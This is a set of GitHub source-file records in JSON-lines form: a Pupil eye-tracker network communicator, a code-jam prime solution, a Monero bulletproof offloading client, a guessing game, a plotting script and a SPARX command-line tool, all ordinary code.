notification['reason']\n            event = self._callCalibrationCallback(CAL_FAIL,ts, reason)\n\n        elif (notification.get('subject',None) == 'rec_started' and\n            notification.get('source',None) != RECORDING_SOURCE_PUPIL_INTERFACE):\n            event = self._callRecordingCallback(REC_STA, ts, {\n                'rec_path': notification['rec_path'],\n                'session_name': notification['session_name']\n            })\n\n        elif (notification.get('subject',None) == 'rec_stopped' and\n            notification.get('source',None) != RECORDING_SOURCE_PUPIL_INTERFACE):\n            event = self._callRecordingCallback(REC_STO, ts, {\n                'rec_path': notification['rec_path']\n            })\n        return event\n\n    def _handle_network(self,network):\n        '''\n        Override to receive network events\n        '''\n        msg_type, cmds = super(Communicator, self)._handle_network(network)\n        self.queueEvent({'net_sync':(msg_type,cmds)})\n        return (msg_type, cmds)\n\n    def _sub_loop(self,context,pipe):\n        '''\n        Subscription Thread Loop\n\n        Connects to the Pupil Server given by `sub_addr:sub_port` and\n        subscribes to gaze position updates, queueing them as events.\n        '''\n        socket = context.socket(zmq.SUB)\n        network_mon = socket.get_monitor_socket()\n        socket.connect(self.sub_addr+':'+self.sub_port)\n        #get gaze data only\n        socket.setsockopt(zmq.SUBSCRIBE, 'gaze_positions')\n\n        poller = zmq.Poller()\n        poller.register(pipe, zmq.POLLIN)\n        poller.register(socket, zmq.POLLIN)\n        poller.register(network_mon, zmq.POLLIN)\n\n        while True:\n            try:\n                #this should not fail but it does sometimes. We need to clean this out.\n                # I think we are not treating sockets correctly as they are not thread-safe.\n                items = dict(poller.poll())\n            except zmq.ZMQError:\n                logger.warning('Socket fail.')\n                continue\n\n            if network_mon in items and items[network_mon] == zmq.POLLIN:\n                mon_msg = recv_monitor_message(network_mon)\n                if mon_msg['event'] == zmq.EVENT_CONNECTED:\n                    self.queueEvent({'net_subscription':mon_msg})\n                # TODO: disconnect event?\n\n            # get socket events\n            if socket in items and items[socket] == zmq.POLLIN:\n                topic,msg = socket.recv_multipart()\n                data = json.loads(msg)\n                self.queueEvent({topic:data})\n\n            if pipe in items and items[pipe] == zmq.POLLIN:\n                message = pipe.recv()\n                # message to quit\n                if message.decode('utf-8') == exit_thread:\n                    break\n        self.sub_pipe = None\n        network_mon.close()\n\n    def _callCalibrationCallback(self, event, timestamp, context):\n        if self._isValidCallback(self.calibration_callback):\n            self.calibration_callback(event, timestamp, context)\n        return event\n\n    def _callRecordingCallback(self, event, timestamp, context):\n        if self._isValidCallback(self.recording_callback):\n            self.recording_callback(event, timestamp, context)\n        return event\n\n    def _callNetworkCallback(self, event, context):\n        if self._isValidCallback(self.network_callback):\n            self.network_callback(event,context)\n        return event\n\n    def _callSubscriptionCallback(self, event, context):\n        if self._isValidCallback(self.subscription_callback):\n            self.subscription_callback(event,context)\n        return event\n\n    def _isValidCallback(self,cb):\n        return cb and hasattr(cb, '__call__')\n\n    def queueEvent(self,event):\n        self.event_q.put(event)\n        self.wait_event.set()\n        self.wait_event.clear()\n","repo_name":"papr/pupil-interface","sub_path":"pupil_interface/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12841,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"33305216642","text":"from math import *\n\nn=list(map(int, input().strip().split()))\n\nnumber_of_primes = 0\ncomposites = []\n\ndef isprime(x):\n\tif x < 2:\n\t\treturn False\n\tfor i in range(2, x//2+1):\n\t\tif x%i == 0:\n\t\t\treturn False\n\treturn True\n\ndef list_gcd(nums):\n\tif len(nums) == 1:\n\t\treturn nums[0]\n\n\tdiv = gcd(nums[0], nums[1])\n\n\tif len(nums) == 2:\n\t\treturn div\n\t\t\n\tfor i in range(1, len(nums) - 1):\n\t\tdiv = gcd(div, nums[i + 1])\n\t\tif div == 1:\n\t\t\treturn div\n\treturn div\n\ndef GIF(x):\n\treturn int(floor(x))\n\nfor i in n:\n\tif isprime(i):\n\t\tnumber_of_primes+=1\n\telse:\n\t\tcomposites.append(i)\n\t\t\ns=0\n\nif number_of_primes!=0 and len(composites)!=0:\n\ts=(number_of_primes/list_gcd(composites))*len(n)\n\t\nprint(GIF(s))","repo_name":"SumukhPrasad/DiPS-CodeJam-2023","sub_path":"06-array-significance/sampleSolution.py","file_name":"sampleSolution.py","file_ext":"py","file_size_in_byte":647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"}
{"seq_id":"32933749243","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Author: Dusan Klinec, ph4r05, 2018\n# Bulletproof offloading client\n\nimport os\nimport time\nimport logging\nimport binascii as ubinascii\nfrom monero_serialize.core.message_types import MessageType\nfrom monero_serialize.xmrtypes import ECKey, KeyV\n\nfrom monero_glue.hwtoken import misc as tmisc\nfrom monero_glue.xmr import crypto, monero, wallet\nfrom monero_glue.xmr import bulletproof as bp\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass BulletproofFull(MessageType):\n    __slots__ = 
['V', 'A', 'S', 'T1', 'T2', 'taux', 'mu', 'L', 'R', 'a', 'b', 't']\n MFIELDS = [\n ('V', KeyV),\n ('A', ECKey),\n ('S', ECKey),\n ('T1', ECKey),\n ('T2', ECKey),\n ('taux', ECKey),\n ('mu', ECKey),\n ('L', KeyV),\n ('R', KeyV),\n ('a', ECKey),\n ('b', ECKey),\n ('t', ECKey),\n ]\n\n\n_tmp_bf_0 = bytearray(32)\n_tmp_bf_1 = bytearray(32)\n\n_tmp_pt_1 = crypto.new_point()\n_tmp_pt_2 = crypto.new_point()\n_tmp_pt_3 = crypto.new_point()\n_tmp_pt_4 = crypto.new_point()\n\n_tmp_sc_1 = crypto.new_scalar()\n_tmp_sc_2 = crypto.new_scalar()\n_tmp_sc_3 = crypto.new_scalar()\n_tmp_sc_4 = crypto.new_scalar()\n\n\ndef comp_fold_idx(batching, nprime, i):\n ia0 = 32 * (i * batching)\n ia1 = ia0 + 32 * batching\n ib0 = 32 * (i * batching + nprime)\n ib1 = ib0 + 32 * batching\n return ia0, ia1, ib0, ib1\n\n\ndef comp_folding(rrcons, nprime, v, ix):\n # Compute folding all in memory\n # Gp_{LO, i} = m_0 bl0^{-1} w G_i + m_0 bl1^{-1} w^{-1} G_{i+h}\n # Gp_{HI, i} = m_1 bl0^{-1} w G_i + m_1 bl1^{-1} w^{-1} G_{i+h}\n P0, P1 = v.slice_view(0, nprime//2), v.slice_view(nprime, nprime + nprime//2)\n P2, P3 = v.slice_view(nprime//2, nprime), v.slice_view(nprime + nprime//2, nprime * 2)\n D0, D1 = v.slice_view(0, nprime//2), v.slice_view(nprime//2, nprime)\n a0, a1 = rrcons[4*ix+0], rrcons[4*ix+1]\n a2, a3 = rrcons[4*ix+2], rrcons[4*ix+3]\n\n if ix in (0, 1):\n bp.hadamard_fold(P0, a=a0, b=a1, into=D0, vR=P1, full_v=True)\n bp.hadamard_fold(P2, a=a2, b=a3, into=D1, vR=P3, full_v=True)\n else:\n bp.scalar_fold(P0, a=a0, b=a1, into=D0, vR=P1, full_v=True)\n bp.scalar_fold(P2, a=a2, b=a3, into=D1, vR=P3, full_v=True)\n v.resize(nprime)\n return v\n\n\ndef comp_offdots(Gprime, Hprime, aprime, bprime, nprime):\n # Computing dot products in-memory, blinded\n npr2 = nprime * 2\n cL = bp.inner_product(\n aprime.slice_view(0, nprime), bprime.slice_view(nprime, npr2), None\n )\n\n cR = bp.inner_product(\n aprime.slice_view(nprime, npr2), bprime.slice_view(0, nprime), None\n )\n\n LcA = bp.vector_sum_aA(None, aprime.slice_view(0, nprime), Gprime.slice_view(nprime, npr2))\n LcB = bp.vector_sum_aA(None, bprime.slice_view(nprime, npr2), Hprime.slice_view(0, nprime))\n\n RcA = bp.vector_sum_aA(None, aprime.slice_view(nprime, npr2), Gprime.slice_view(0, nprime))\n RcB = bp.vector_sum_aA(None, bprime.slice_view(0, nprime), Hprime.slice_view(nprime, npr2))\n return cL, cR, LcA, LcB, RcA, RcB\n\n\ndef dechunk_res(buffers, exp_res=1):\n if not buffers or not isinstance(buffers, (list, tuple)):\n return buffers\n\n ln = len(buffers)\n cres = [bytearray() for _ in range(exp_res)]\n for c in range(exp_res):\n cbuff = buffers[c] if exp_res > 1 else buffers\n if not isinstance(cbuff, (list, tuple)):\n cres[c] += cbuff\n continue\n\n for i in range(len(cbuff)):\n cres[c] += cbuff[i]\n\n return cres if exp_res > 1 else cres[0]\n\n\ndef vect_clone(dst, src):\n dst = bp.ensure_dst_keyvect(dst, len(src))\n for i in range(len(src)):\n dst.read(i, src.to(i))\n return dst\n\n\ndef count_bytes(buffers):\n if buffers is None:\n return 0\n if isinstance(buffers, (list, tuple)):\n return sum([count_bytes(x) for x in buffers])\n elif isinstance(buffers, (bytearray, bytes, str)):\n return len(buffers)\n else:\n logger.debug(\"Unknown type for count_bytes(): %s \" % (type(buffers),))\n return 0\n\n\nclass BulletproofClient:\n def __init__(self, m=1, messenger=None):\n # Main sending coroutine\n # Arguments: p1, p2, params, buffers\n self.messenger = messenger\n\n self.off_method = 3\n self.nprime_thresh = 64\n self.batching = 32\n self.off2_thresh = 32\n 
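# offloading knobs used below: off_method selects how much folding and\n        # dot-product work stays on this host, nprime_thresh/off2_thresh bound\n        # when inner-product rounds move in-memory, and batching is the number\n        # of 32-byte scalars exchanged per message\n        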
self.M = m\n self.MN = 64 * self.M\n\n self.is_debug = True\n self.do_timing = True\n self.time_start = None\n self.timing_bins = {}\n self.n_msgs = 0\n self.n_sent = 0\n self.n_recv = 0\n self.prove_time = 0\n\n async def comm(self, p1=0, p2=0, params=None, buffers=None):\n return await self.messenger(p1, p2, params, buffers)\n\n async def bp_tx_buffers(self, buffers=None):\n buffers = buffers if buffers else []\n self.n_msgs += 1\n self.n_sent += count_bytes(buffers)\n r = await self.comm(p1=1, p2=0, buffers=buffers)\n self.n_recv += count_bytes(r)\n return r\n\n async def bp_final(self):\n self.n_msgs += 1\n r = await self.comm(p1=1, p2=0)\n self.n_recv += count_bytes(r)\n return r\n\n async def bp_start(self, ln, offm=2, nprime_thresh=32, off2_thresh=32, batching=32):\n self.n_msgs += 1\n r = await self.comm(p1=0, p2=ln, params=[offm, nprime_thresh, off2_thresh, batching])\n self.n_recv += count_bytes(r)\n return r\n\n async def compute_bp(self):\n ln = self.M\n self.MN = 64 * ln\n\n bpi = bp.BulletProofBuilder()\n l = bytearray()\n r = bytearray()\n aprime = l\n bprime = r\n logger.debug('Batching: %s, MN: %s, chunks: %s, M: %s' % (self.batching, self.MN, self.MN // self.batching, ln))\n\n ttstart = time.time()\n l0, r0 = dechunk_res(await self.bp_start(ln, self.off_method, self.nprime_thresh, self.off2_thresh, self.batching), 2)\n l += l0\n r += r0\n\n for i in range(1, self.MN // self.batching):\n logger.debug('.. l, r: %s' % i)\n l0, r0 = dechunk_res(await self.bp_tx_buffers(None), 2)\n l += l0\n r += r0\n\n logger.debug('l, r finished')\n rrcons = await self.bp_tx_buffers(None)\n logger.debug('Phase 1 finishing: %s' % rrcons)\n logger.debug('Phase 1 finished')\n\n y = rrcons[0] if rrcons and len(rrcons) > 0 else None\n\n # First while-loop iteration, dot-product computation, lC, lR, Lc, Lr, w, winv\n if self.off_method == 0:\n # round 0 - aLow, bHigh\n logger.debug('r0, cLcR aLow')\n for i in range(self.MN // self.batching // 2):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, self.MN // 2, i)\n logger.debug(' .. i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n rrcons = await self.bp_tx_buffers((l[ia0:ia1], r[ib0:ib1]))\n logger.debug(rrcons)\n\n # round 0 - aHigh, bLow\n logger.debug('r0, cLcR aHigh')\n for i in range(self.MN // self.batching // 2):\n ib0, ib1, ia0, ia1 = comp_fold_idx(self.batching, self.MN // 2, i)\n logger.debug(' .. 
i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n rrcons = await self.bp_tx_buffers((l[ia0:ia1], r[ib0:ib1]))\n logger.debug(rrcons)\n\n else:\n # round 0 - aLow, bHigh; aHigh, bLow in memory\n logger.debug('r0, cLcR off, nprime: %s' % str(self.MN // 2))\n yinvpow = vect_clone(None, bp.KeyVPowers(self.MN, bp.invert(None, y)))\n Gprec = vect_clone(None, bpi._gprec_aux(self.MN))\n Hprec = vect_clone(None, bpi._hprec_aux(self.MN))\n Hprime = vect_clone(None, bp.KeyVEval(self.MN, lambda i, d: bp.scalarmult_key(d, Hprec[i], yinvpow[i])))\n\n cL, cR, LcA, LcB, RcA, RcB = comp_offdots(Gprec, Hprime, bp.KeyV(self.MN, l), bp.KeyV(self.MN, r), self.MN // 2)\n rrcons = await self.bp_tx_buffers((cL, cR, LcA, LcB, RcA, RcB))\n logger.debug(rrcons)\n\n # round 0 folding, G, H, a, b\n Gprime = bytearray()\n Hprime = bytearray()\n app = bytearray()\n bpp = bytearray()\n cbatch = max(1, self.MN // 2 // self.batching // 2)\n\n logger.debug('r0, fold G')\n for i in range(cbatch):\n cres = dechunk_res(await self.bp_tx_buffers(None))\n if cres: Gprime += cres\n\n logger.debug('r0, fold H')\n for i in range(cbatch):\n cres = dechunk_res(await self.bp_tx_buffers(None))\n if cres: Hprime += cres\n\n Gprime = bp.KeyV(self.MN // 2, Gprime)\n Hprime = bp.KeyV(self.MN // 2, Hprime)\n\n if self.off_method == 3:\n logger.debug('r0 in-mem meth3 fold Gprime')\n Gprec = vect_clone(None, bpi._gprec_aux(self.MN))\n comp_folding(rrcons, self.MN // 2, Gprec, 0)\n\n logger.debug('r0 in-mem meth3 fold Hprime')\n Hprec_ = vect_clone(None, bpi._hprec_aux(self.MN))\n ypowinv = vect_clone(None, bp.KeyVPowers(self.MN, bp.invert(_tmp_bf_0, y)))\n Hprec = vect_clone(None, bp.KeyVEval(self.MN, lambda i, d: bp.scalarmult_key(d, Hprec_.to(i), yinvpow[i])))\n comp_folding(rrcons, self.MN // 2, Hprec, 1)\n\n logger.debug('r0 in-mem meth3 correct G, H')\n for i in range(self.MN // 2):\n crypto.decodepoint_into(_tmp_pt_1, Gprec.to(i))\n crypto.decodepoint_into(_tmp_pt_2, Gprime.to(i))\n crypto.point_sub_into(_tmp_pt_1, _tmp_pt_1, _tmp_pt_2)\n crypto.encodepoint_into(_tmp_bf_0, _tmp_pt_1)\n Gprime.read(i, _tmp_bf_0)\n\n crypto.decodepoint_into(_tmp_pt_1, Hprec.to(i))\n crypto.decodepoint_into(_tmp_pt_2, Hprime.to(i))\n crypto.point_sub_into(_tmp_pt_1, _tmp_pt_1, _tmp_pt_2)\n crypto.encodepoint_into(_tmp_bf_0, _tmp_pt_1)\n Hprime.read(i, _tmp_bf_0)\n\n if self.off_method >= 2:\n logger.debug('in-mem fold for a, b')\n aprime = bp.KeyV(self.MN, l)\n bprime = bp.KeyV(self.MN, r)\n comp_folding(rrcons, self.MN // 2, aprime, 2)\n comp_folding(rrcons, self.MN // 2, bprime, 3)\n\n else:\n logger.debug('r0, fold a')\n for i in range(self.MN // self.batching // 2):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, self.MN // 2, i)\n cres = dechunk_res(await self.bp_tx_buffers((aprime[ia0:ia1], aprime[ib0:ib1])))\n if cres: app += cres\n\n logger.debug('r0, fold b')\n for i in range(self.MN // self.batching // 2):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, self.MN // 2, i)\n cres = dechunk_res(await self.bp_tx_buffers((bprime[ia0:ia1], bprime[ib0:ib1])))\n if cres: bpp += cres\n\n aprime = bp.KeyV(self.MN // 2, app)\n bprime = bp.KeyV(self.MN // 2, bpp)\n\n logger.debug('0PC r: %s, ap %s %s' % (0, len(aprime), ubinascii.hexlify(aprime.d[-64:])))\n logger.debug('0PC r: %s, bp %s %s' % (0, len(bprime), ubinascii.hexlify(bprime.d[-64:])))\n logger.debug('0PC r: %s, Gp %s %s' % (0, len(Gprime), ubinascii.hexlify(Gprime.d[-64:])))\n logger.debug('0PC r: %s, Hp %s %s' % (0, len(Hprime), ubinascii.hexlify(Hprime.d[-64:])))\n\n # Loops:\n # - clcr 
part, compute blinded cL, cR, LcA, LcB, RcA, RcB\n nprime = self.MN // 4\n round = 0\n while round == 0 or nprime >= self.nprime_thresh or (self.off_method >= 2 and nprime >= self.off2_thresh):\n npr2 = nprime * 2\n round += 1\n\n logger.debug('Client, BPI nprime: %s, CLI nprime: %s, |Gprime|: %s' % (nprime, nprime, len(Gprime)))\n if self.off_method == 0:\n # round 0 - aLow, bHigh\n logger.debug('r%s, cLcR aLow' % round)\n for i in range(nprime // self.batching):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, nprime, i)\n logger.debug(' .. i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n rrcons = await self.bp_tx_buffers(\n (aprime.d[ia0:ia1], bprime.d[ib0:ib1], Gprime.d[ib0:ib1], Hprime.d[ia0:ia1]))\n logger.debug(rrcons)\n\n # round 0 - aHigh, bLow\n logger.debug('r%s, cLcR aHigh' % round)\n for i in range(nprime // self.batching):\n ib0, ib1, ia0, ia1 = comp_fold_idx(self.batching, nprime, i)\n logger.debug(' .. i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n rrcons = await self.bp_tx_buffers(\n (aprime.d[ia0:ia1], bprime.d[ib0:ib1], Gprime.d[ib0:ib1], Hprime.d[ia0:ia1]))\n logger.debug(rrcons)\n\n else:\n # Computing dot products in-memory, blinded\n cL, cR, LcA, LcB, RcA, RcB = comp_offdots(Gprime, Hprime, aprime, bprime, nprime)\n logger.debug('clcr step, r %s' % round)\n rrcons = await self.bp_tx_buffers((cL, cR, LcA, LcB, RcA, RcB))\n logger.debug(rrcons)\n\n for ix, v in enumerate((Gprime, Hprime, aprime, bprime)):\n logger.debug('Folding IX: %s, r %s' % (ix, round))\n\n # Offloaded folding up to batching limit / limit defined by Trezor\n # Can be e.g. 8 elements. Remaining 8 computed in memory in the Trezor\n if self.off_method >= 2 and rrcons:\n logger.debug('.. PC: in-memory fold, len: %s; %s' % (len(v), nprime))\n comp_folding(rrcons, nprime, v, ix)\n\n if ix == 3:\n nprime >>= 1\n continue\n\n # Ordinary folding for methods [0, 1]\n bf = v.d\n nf = bytearray()\n cbatching = min(self.batching, nprime)\n for i in range(max(1, nprime // cbatching)):\n ia0, ia1, ib0, ib1 = comp_fold_idx(self.batching, nprime, i)\n logger.debug(' .. 
i: %s, %s:%s, %s:%s' % (i, ia0, ia1, ib0, ib1))\n\n                lo = bf[ia0:ia1]\n                hi = bf[ib0:ib1]\n\n                cres = dechunk_res(await self.bp_tx_buffers((lo, hi)))\n                if cres:\n                    nf += cres\n\n            nf = bp.KeyV(nprime // 2, nf)\n            if ix == 0:\n                Gprime = nf\n            elif ix == 1:\n                Hprime = nf\n            elif ix == 2:\n                aprime = nf\n            elif ix == 3:\n                bprime = nf\n            nprime >>= 1\n\n        logger.debug('wPC r: %s, ap %s %s' % (round, len(aprime), ubinascii.hexlify(aprime.d[-64:])))\n        logger.debug('wPC r: %s, bp %s %s' % (round, len(bprime), ubinascii.hexlify(bprime.d[-64:])))\n        logger.debug('wPC r: %s, Gp %s %s' % (round, len(Gprime), ubinascii.hexlify(Gprime.d[-64:])))\n        logger.debug('wPC r: %s, Hp %s %s' % (round, len(Hprime), ubinascii.hexlify(Hprime.d[-64:])))\n\n        proof = await self.bp_final()\n        proof = await tmisc.parse_msg(proof[0], BulletproofFull())\n        self.prove_time = time.time() - ttstart\n        return proof\n\n\nclass BulletproofMPCRunner:\n    def __init__(self):\n        self.state = None\n        self.prev_mem = 0\n        self.cur_mes = 0\n\n    def bpp(self, instance=None):\n        if instance:\n            self.state = instance\n        return self.state\n\n    def check_mem(self, x):\n        # gc.collect()\n        free = 0 # gc.mem_free()\n        diff = self.prev_mem - free\n        logger.debug(\n            \"======= {} {} Diff: {} Free: {} Allocated: {}\".format(\n                self.cur_mes, x, diff, free, '?', # gc.mem_alloc()\n            ),\n        )\n        # micropython.mem_info()\n        # gc.collect()\n        self.cur_mes += 1\n        self.prev_mem = free\n\n    def log_trace(self, x=None):\n        logger.debug(\n            \"Log trace %s, ... F: %s A: %s, S: %s\",\n            x,\n            '?', # gc.mem_free(),\n            '?', # gc.mem_alloc(),\n            '?', # micropython.stack_use(),\n        )\n\n    async def step(self, p1=0, p2=2, params=None, buffers=None):\n        if p1 == 0:\n            self.bpp(None) # clear old state\n\n        self.check_mem(\"+++BP START: %s; %s\" % (p1, p2))\n        # gc.collect()\n        self.log_trace(\"BP START\")\n\n        # Crypto function call number reporting not implemented here\n        # It is in git: ph4r05/trezor-firmware/pr/bpoff-counting-exp\n\n        bpi, res = None, None\n        if p1 == 0:\n            # crypto.report_reset()\n            bp.set_prng(crypto.prng(bp.ZERO))\n            bpi = bp.BulletProofBuilder()\n            # bpi.gc_fnc = gc.collect\n            bpi.gc_trace = self.log_trace\n            sv = [crypto.sc_init(137 * i) for i in range(p2)]\n            gamma = [crypto.sc_init(991 * i) for i in range(p2)]\n\n            bpi.off_method = 2 if not params else params[0]\n            if params and len(params) >= 4:\n                bpi.nprime_thresh = params[1]\n                bpi.off2_thresh = params[2]\n                bpi.batching = params[3]\n\n            res = bpi.prove_batch_off(sv, gamma, buffers)\n            # crypto.report()\n            state = bpi.dump_state()\n            # del (bp, bpi)\n            # gc.collect()\n            self.log_trace(\"BP STATE\")\n            self.bpp((state, None))\n            # self.bpp((state, crypto.report_get()))\n            # del (crypto)\n            # gc.collect()\n            self.log_trace(\"BP STATE2\")\n\n        else:\n            # crypto.report_reset()\n            state, fncs = self.bpp()\n            bpi = bp.BulletProofBuilder()\n            bpi.load_state(state)\n            del (state)\n            self.bpp(None)\n            # gc.collect()\n            self.log_trace(\"From state\")\n\n            # bp.PRNG = crypto.prng(bp._ZERO)\n            # bpi.gc_fnc = gc.collect\n            bpi.gc_trace = self.log_trace\n\n            # crypto.report_reset()\n            # crypto.report_set(fncs)\n            res = bpi.prove_batch_off_step(buffers)\n            # crypto.report()\n            state = bpi.dump_state()\n            del bpi\n            # del (bp, bpi)\n            # gc.collect()\n            self.log_trace(\"BP STATE\")\n            self.bpp((state, fncs))\n            # del (crypto)\n            # gc.collect()\n            self.log_trace(\"BP STATE2\")\n\n        # gc.collect()\n        self.log_trace(\"BP STEP\")\n        self.check_mem(\"+++BP STEP\")\n        if isinstance(res, tuple) and res[0] == 1:\n            from monero_glue.hwtoken import misc as tmisc\n            B = res[1]\n            B2 = 
BulletproofFull()\n B2.V = B.V\n B2.S = B.S\n B2.A = B.A\n B2.T1 = B.T1\n B2.T2 = B.T2\n B2.taux = B.taux\n B2.mu = B.mu\n B2.L = B.L\n B2.R = B.R\n B2.a = B.a\n B2.b = B.b\n B2.t = B.t\n res = await tmisc.dump_msg(B2)\n\n msg = None\n if res:\n msg = res if isinstance(res, (list, tuple)) else [res]\n return msg\n","repo_name":"ph4r05/monero-agent","sub_path":"monero_glue/xmr/bulletproof_cl.py","file_name":"bulletproof_cl.py","file_ext":"py","file_size_in_byte":19327,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"47"} +{"seq_id":"7429813436","text":"import random\n\nclass GuessGame(object):\n\t\"\"\"Guessing Game\"\"\"\n\t\n\tdef __init__(self):\n\t\tself.number = random.randint(0,10)\n\t\tself.players = []\n\t\t\n\tdef startGame(self, numPlayers):\n\t\t# create list of players\n\t\t\n\t\tfor i in range(0, numPlayers):\n\t\t\ts = Player()\n\t\t\tself.players.append(s)\n\t\t\t\n\t\tfor i in range(0, 1000):\n\t\t\tfor j in range(0, numPlayers):\n\t\t\t\t# prints old, asks for guess then verifies\n\t\t\t\tprint(\"------------------------------------------\")\n\t\t\t\tprint(\"---Player %s---\" % (j+1))\n\t\t\t\tprint(\"Current Guess:\", (self.players[j]).number)\n\t\t\t\t\n\t\t\t\t# prompt for input and check whether correct\n\t\t\t\t(self.players[j]).number = (self.players[j]).guess()\n\t\t\t\tif (self.players[j]).number == self.number:\n\t\t\t\t\tprint(\"\\nYou guessed right! The number is %s\\n\" % self.number)\n\t\t\t\t\treturn True\n\t\t\t\telse:\n\t\t\t\t\tprint(\"\\nWRONG!\\n\")\n\t\t\t\t\n\t\t\t\t\n\t\treturn False # game did not complete\t\t\n\nclass Player(object):\n\t\"\"\" Player object\"\"\"\n\tdef __init__(self):\n\t\tself.number = -1 # guessed number\n\t\n\tdef guess(self):\n\t\tplayerGuessNum = -1\n\t\twhile True:\n\t\t\tplayerGuessNum = input(\"Enter Guess: \")\n\t\t\tplayerGuessNum = int(playerGuessNum)\n\t\t\t\n\t\t\t# check\n\t\t\tif playerGuessNum >= 0 and playerGuessNum <= 9:\n\t\t\t\tbreak\n\t\t\t\t\n\t\t\tprint(\"INVALID INPUT: must be from 0 through 9\")\n\t\t\t\n\t\treturn playerGuessNum\n\n\n#initialize game\ngame1 = GuessGame()\n\n# asks for number of players\nwhile True:\n\tnumberPlayers = int(input(\"Enter number of players:\"))\n\tif numberPlayers >= 1:\n\t\tbreak\n\t\n\tprint(\"INVALID INPUT: must be greater or equal to 1\")\n\ngameFinished = game1.startGame(numberPlayers)\n\nif gameFinished == False:\n\tprint(\"Game did not finish.\")\nelse:\n\tprint(\"Game over.\")","repo_name":"williamrobotma/number-guess-python","sub_path":"GuessGameLauncher.py","file_name":"GuessGameLauncher.py","file_ext":"py","file_size_in_byte":1631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"35557973222","text":"#!/usr/bin/env python\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nGRAPH_TITLE = \"Execution Time vs Width\"\nX_TITLE = \"Width\"\nY_TITLE = \"Execution time (s)\"\n\n#----------------------------------------------------------------------\n# Butterfly image execution time graph\n#----------------------------------------------------------------------\nbutterfly_data = pd.read_csv(\"butterfly_execution_time.csv\")\n\nx = butterfly_data.iloc[:,0]\ny_serial = butterfly_data.iloc[:,1]\ny_parallel = butterfly_data.iloc[:,2]\n\nplt.figure(figsize=(5,3), dpi=100)\nplt.gcf().subplots_adjust(bottom=0.16)\n\nplt.plot(x, y_serial, label=\"Serial time\")\nplt.plot(x, y_parallel, label=\"Parallel 
time\")\n\nplt.grid(True)\n\nplt.title(GRAPH_TITLE)\nplt.xlabel(X_TITLE)\nplt.ylabel(Y_TITLE)\nplt.legend()\n\nplt.savefig(\"butterfly-execution-time-graph.png\", dpi=300)\n\nplt.show()\n\n#----------------------------------------------------------------------\n# Radiograph image execution time graph\n#----------------------------------------------------------------------\nradiograph_data = pd.read_csv(\"radiograph_execution_time.csv\")\n\nx = radiograph_data.iloc[:,0]\ny_serial = radiograph_data.iloc[:,1]\ny_parallel = radiograph_data.iloc[:,2]\n\nplt.figure(figsize=(5,3), dpi=100)\nplt.gcf().subplots_adjust(bottom=0.16)\n\nplt.plot(x, y_serial, label=\"Serial time\")\nplt.plot(x, y_parallel, label=\"Parallel time\")\n\nplt.grid(True)\n\nplt.title(GRAPH_TITLE)\nplt.xlabel(X_TITLE)\nplt.ylabel(Y_TITLE)\nplt.legend()\n\nplt.savefig(\"radiograph-execution-time-graph.png\", dpi=300)\n\nplt.show()\n","repo_name":"AaronSolera/MeanFilterVectorization","sub_path":"graphic_results.py","file_name":"graphic_results.py","file_ext":"py","file_size_in_byte":1561,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"72903095183","text":"import global_def\nfrom global_def import *\nfrom optparse import OptionParser\nfrom EMAN2_cppwrap import *\n\nimport os\nimport sys\n\n \ndef main():\n\tprogname = os.path.basename(sys.argv[0])\n\tusage = progname + \" prj_stack .. average eigvol output_factcoords --rad=radius --neigvol=number_of_eigvol --CTF\"\n\tparser = OptionParser(usage, version=SPARXVERSION)\n\tparser.add_option(\"--rad\", type=\"int\", default=-1, help=\"radius of mask\")\n\tparser.add_option(\"--neigvol\", type=\"int\", default=-1, help=\"number of eigvenvectors to use (default all)\")\n\tparser.add_option(\"--fl\", type=\"float\", default=0.0, help=\"cut-off frequency of hyperbolic tangent low-pass Fourier filter\")\n\tparser.add_option(\"--aa\", type=\"float\", default=0.0, help=\"fall-off of hyperbolic tangent low-pass Fourier filter\")\n\tparser.add_option(\"--CTF\", action=\"store_true\", default=False, help=\"Use CTF\")\n\tparser.add_option(\"--MPI\", action=\"store_true\", help=\"use MPI\")\n\n\t(options, args) = parser.parse_args()\n\n\tif( len(args) < 4 ):\n\t\tprint(\"usage: \" + usage)\n\t\tprint(\"Please run '\" + progname + \" -h' for details\")\n\telse:\n\t\tstacks = args[0:-3]\n\t\tavgvol = args[-3]\n\t\teigvol = args[-2]\n\t\toutput = args[-1]\n\t\t\n\t\tif options.rad < 0:\n\t\t\tprint(\"Error: mask radius is not given\")\n\t\t\tsys.exit(-1)\n\t\tif global_def.CACHE_DISABLE:\n\t\t\tfrom utilities import disable_bdb_cache\n\t\t\tdisable_bdb_cache()\n\t\tif options.MPI:\n\t\t\tfrom mpi import mpi_init\n\t\t\tsys.argv = mpi_init(len(sys.argv), sys.argv)\n\n\t\tfrom utilities import get_im\n\t\tglobal_def.BATCH = True\n\t\tif( get_im( stacks[0]).get_zsize() == 1 and get_im( eigvol).get_zsize() > 1):\n\t\t\tfrom applications import factcoords_prj\n\t\t\tfactcoords_prj(stacks, avgvol, eigvol, output, options.rad, options.neigvol, options.fl, options.aa, options.CTF, options.MPI)\n\t\telse:\n\t\t\tfrom applications import factcoords_vol\n\t\t\tfactcoords_vol(stacks, avgvol, eigvol, output, options.rad, options.neigvol, options.fl, options.aa, options.MPI)\n\t\tglobal_def.BATCH = False\n\t\t\n\nif __name__ == 
